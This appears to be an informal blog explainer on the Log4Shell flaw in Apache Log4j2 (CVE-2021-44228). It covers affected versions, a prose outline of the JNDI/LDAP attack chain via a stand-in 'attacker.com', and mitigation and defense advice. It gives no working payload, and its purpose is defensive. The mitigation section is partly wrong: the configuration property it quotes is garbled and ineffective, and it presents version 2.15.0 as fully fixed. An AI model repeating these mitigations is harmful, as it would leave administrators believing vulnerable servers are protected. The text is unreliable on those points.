LOG4J vulnerability (CVE-2021–44228)
Summary :
Log4j2 is a open source java-based logging framework commonly incorporated into Apache web server and spring-boot web applications
the vulnerability has been reported CVE-2021–44228 against the log4j-core.jar. CVE2021–44228 is considered a critical flaw and it has based score 10 which is the highest possible severe rating.
Who is impacted !!
Too many services are vulnerable to this exploit as log4j used java-based jogging utility. cloud services such as apple i Cloud and other cloud services are affected , anyone using Apache framework services or any spring-boot java-based framework applications used log4j is likely to be vulnerable.
Working of exploit :
the exploit works when three is a service or application running with vulnerable version of log4j2
attacker who can control log messages or log message parameters can execute arbitrary code in the vulnerable server loaded from the LDAP server when message lookup sub is enabled
Affected Apache log4j2 versions
2.0 <=Apache log4j2 <= 2.14.1
Exploit requirements:
A server with a vulnerability log4j version
Exploitation steps :
- data from the users get sent to the server
- the server logs the data in the request containing malicious payload
- the Log4j vulnerability is triggered by the payload and the server makes request to attacker.com via JNDI (Java Naming and Directory Interface
- this response contains a path to a remote java class files , which is inject into the server process.
- this injected payload is trigger a second stage and allows an attacker to execute arbitrary code.
How to mitigate :
- admin/system team running a search/grep command on all server to spot any file with name “log4j2” , then checking if it is a vulnerable version or not form the Vulnerability dB and matching with CVE’s
- updating version 2.15.0 of log4j which has been released without the vulnerability
- Adding “log4.format.msg.nolookup=true” to the global conf of the web server applications.
Defense :
> Remote Lookup can be disabled
> Using firewalls to prevent remote calls to unexpected servers
— Applying proper firewall rules on the application servers such that they are only allowed to communicate to the known request
— Running application with least privileged accounts
— Running application in the virtual environment for rapid restoration and constrained network
— Deploying honeypots to find the exploitation reconnaissance.
— Deploying honeypots near the suspected applications.
Indicators of Attacks
> Spike in CPU performance
> Unauthorized configuration change
> Disparate logs & commands needed
Attacks seen against this vulnerability :
> Attackers are trying to exploit the DNS
> Request Strings are encoded with base64.
> HTTPS delivery mechanism
> Exploiting DNS
Reference :
- https://www.indiatoday.in/technology/news/story/log4j-zero-day-vulnerability-discovered-affects-icloud-minecraft-steam-and-more-services-1886670-2021-12-11
- https://www.theverge.com/2021/12/10/22828303/log4j-library-vulnerability-log4shell-zero-day-exploit
- https://www.kaspersky.co.in/blog/log4shell-critical-vulnerability-in-apache-log4j/23739/
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/
- https://www.picussecurity.com/resource/blog/simulating-and-preventing-cve-2021-44228-apache-log4j-rce-exploits
Conclusion :
As this vulnerability in the java library class affects all the java running applications servers , this would stay for long time as related as to pandemic.
Thanks for your time in reading this happy hacking everyone.
